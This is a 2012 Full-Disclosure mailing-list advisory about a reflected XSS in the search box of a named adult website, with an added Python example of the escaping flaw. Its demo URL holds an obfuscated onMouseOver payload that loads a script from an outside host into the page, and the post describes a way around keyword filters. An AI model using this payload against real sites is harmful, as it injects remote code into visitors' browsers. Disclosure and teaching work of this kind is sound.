Message-ID: <4F9223FB.2090609@xiscosoft.es>
Date: Sat, 21 Apr 2012 05:05:31 +0200
From: klondike <klondike@...cosoft.es>
To: full-disclosure@...ts.grok.org.uk
Subject: XSS parameter injection in the search field of http://chicasdetorbe.com
Hello,
Yesterday I discovered a funny XSS injection in the website
http://chicasdetorbe.com, which is an affiliate site of the popular
website http://www.putalocura.com/.
Despite my efforts at contacting the site owner I received silence
as an answer; I suppose because he thought this was either not serious or he
just wanted to ignore me. Thus, after having sent various warnings of
Full Disclosure, I have decided to publish the whole thing.
The vulnerability:
The vulnerability is quite simple: the contents of the search string are
pasted inside the value attribute of the search input, with only the
characters ' " and \ escaped (each gets an extra \ in front). Thus you can
insert whichever attributes you want, which allows for event-based
injection as long as you don't use the characters ' " or \, since they
will be escaped with an extra \.
Take into account that even if they tried to detect dangerous strings,
this would be bypassable by adding <> to the payload, since those
characters are removed by the content manager.
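The escaping mismatch described above, as an added example that is not part of the original post: backslash-escaping the quote characters (the behaviour the advisory describes) is JavaScript-string escaping and means nothing to an HTML parser, so a leading " still closes the value attribute, while HTML entity encoding keeps the whole search string inside it. The search box markup and the `injected` marker are constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Constructed sample: a search string whose first character closes the value attribute.
SEARCH = '" onmouseover=injected'


def backslash_escape(s: str) -> str:
    """Escaping as the advisory describes it: ' " and \\ each get an extra \\.
    An HTML parser treats the backslash as an ordinary character, so the quote
    still terminates the attribute."""
    return s.replace('\\', '\\\\').replace('"', '\\"').replace("'", "\\'")


def html_escape(s: str) -> str:
    """Context-correct escaping for a double-quoted attribute: " becomes &quot;."""
    return html.escape(s, quote=True)


def render_search_box(value: str, escaper) -> str:
    """Server-side template for the search input (constructed, not the site's markup)."""
    return '<input type="text" name="q" value="%s">' % escaper(value)


class InputAttrs(HTMLParser):
    """Collect the attributes of the first <input> tag the way a browser would see them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == 'input' and self.attrs is None:
            self.attrs = dict(attrs)


def parsed_input_attrs(markup: str) -> dict:
    parser = InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def attribute_breakout(value: str, escaper) -> bool:
    """True if the search string smuggled an extra attribute (e.g. an event handler)
    into the input tag, i.e. the escaper failed for the attribute context."""
    attrs = parsed_input_attrs(render_search_box(value, escaper))
    return bool(set(attrs) - {'type', 'name', 'value'})
```

With `backslash_escape` the parsed tag gains an `onmouseover` attribute; with `html_escape` the input keeps only its three intended attributes and `value` round-trips to the original search string.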
The demo (the site is NSFW so be careful):
1. Go to:
http://chicasdetorbe.com/?q=%22+onMouseOver%3Deval%28unescape%28%2F%2573%253d%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%2572%2565%2561%2574%2565%2545%256c%2565%256d%2565%256e%2574%2528%2527%2573%2563%2572%2569%2570%2574%2527%2529%253b%2573%252e%2573%2572%2563%253d%2527%2568%2574%2574%2570%253a%252f%252f%256b%256c%256f%256e%2564%2569%256b%2565%252e%2565%2573%252f%2564%2565%256d%256f%2574%256f%2572%2562%2565%252e%256a%2573%2527%253b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2567%2565%2574%2545%256c%2565%256d%2565%256e%2574%2573%2542%2579%2554%2561%2567%254e%2561%256d%2565%2528%2527%2568%2565%2561%2564%2527%2529%255b%2530%255d%252e%2561%2570%2570%2565%256e%2564%2543%2568%2569%256c%2564%2528%2573%2529%253b%2F.source%29%29%2F%2F
(You may need to copy and paste the whole link).
2. Put the mouse over the search bar on the top left.
3. Enjoy! (The text is in Spanish and basically offers links to free porn
and photos of chonis, a social group in Spain.)
klondike
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/